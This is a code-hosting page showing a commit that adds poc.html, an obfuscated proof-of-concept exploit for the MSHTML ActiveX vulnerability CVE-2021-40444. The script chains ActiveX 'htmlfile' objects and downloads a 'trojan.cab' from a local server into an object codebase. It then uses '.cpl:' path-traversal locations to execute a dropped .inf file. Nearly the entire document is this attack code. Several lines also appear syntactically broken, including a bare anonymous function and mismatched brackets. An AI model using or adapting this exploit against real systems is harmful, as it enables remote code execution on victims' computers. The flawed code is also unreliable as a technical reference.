crash.software
Projects
Pull Requests
Issues
Builds
CVE-2021-40444-Sample
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY CVE-2021-40444-Sample Commits b82fabf0
🤬
  • ■ ■ ■ ■ ■ ■
    poc.html
     1 +<!DOCTYPE html>
     2 +<html>
     3 + <head>
     4 + <meta http-equiv="Expires" content="-1">
     5 + <meta http-equiv="X-UA-Compatible" content="IE=11">
     6 + </head>
     7 + <body>
     8 + <script>
     9 +function(){
     10 + try{
     11 + window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'],
     12 + window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
     13 + }catch(_0x1c747c){
     14 + window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'],
     15 + window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
     16 + }
     17 + iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile');
     18 + window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close']();
     19 + try{
     20 + window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'],
     21 + window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
     22 + }catch(_0x5afb73){
     23 + window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'],
     24 + window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
     25 + }
     26 + iframeActxHtml1['open']()['close']();
     27 + var iframeActxHtml2= iframeActxHtml1['Script']['ActiveXObject')]('htmlFile');
     28 + iframeActxHtml2['open']()['close']();
     29 + iframeActxHtml3 = iframeActxHtml2[('Script')]['ActiveXObject']('htmlFile');
     30 + iframeActxHtml3['open']()['close']();
     31 + var iframeActxHtml4=new iframeActxHtml3['Script'][('ActiveXObject')]('htmlFile');
     32 + iframeActxHtml4['open']()['close']();
     33 + var actx_html_0=new ActiveXObject('htmlfile'),
     34 + actx_html_1=new ActiveXObject('htmlfile'),
     35 + actx_html_2=new ActiveXObject('htmlfile'),
     36 + actx_html_3=new ActiveXObject('htmlfile'),
     37 + actx_html_4=new ActiveXObject('htmlfile'),
     38 + actx_html_5=new ActiveXObject('htmlfile'),
     39 + xmlhttpreq1=new window['XMLHttpRequest'](),
     40 + window['setTimeout']=window['setTimeout'];
     41 + window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/trojan.cab',![]),
     42 + window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1),
     43 + iframeActxHtml4['Script']['document']['write']('&amp;lt;body>');
     44 + var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');
     45 + cabloadunpack['setAttribute']('codebase','http://localhost/trojan.cab#version=5,0,0,0');
     46 + cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'),
     47 + window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack),
     48 + actx_html_0['Script']['location']='.cpl:123',
     49 + actx_html_0['Script']['location']='.cpl:123',
     50 + actx_html_0['Script']['location']='.cpl:123',
     51 + actx_html_0['Script']['location']='.cpl:123',
     52 + actx_html_0['Script']['location']='.cpl:123',
     53 + actx_html_0['Script']['location']='.cpl:123',
     54 + actx_html_0['Script']['location']='.cpl:123',
     55 + actx_html_0['Script']['location']='.cpl:123',
     56 + actx_html_0['Script']['location']='.cpl:123',
     57 + actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/whoiam.inf',
     58 + actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/whoiam.inf',
     59 + actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/whoiam.inf',
     60 + actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/whoiam.inf',
     61 + actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/whoiam.inf',
     62 + actx_html_3['Script']['location']='.cpl:../../../../../Temp/whoiam.inf',
     63 + actx_html_3['Script']['location']='.cpl:../../Low/whoiam.inf',
     64 + actx_html_3['Script']['location']='.cpl:../../whoiam.inf';
     65 +}();
     66 + </script>
     67 + </body>
     68 +</html>
Please wait...
Page is in error, reload to recover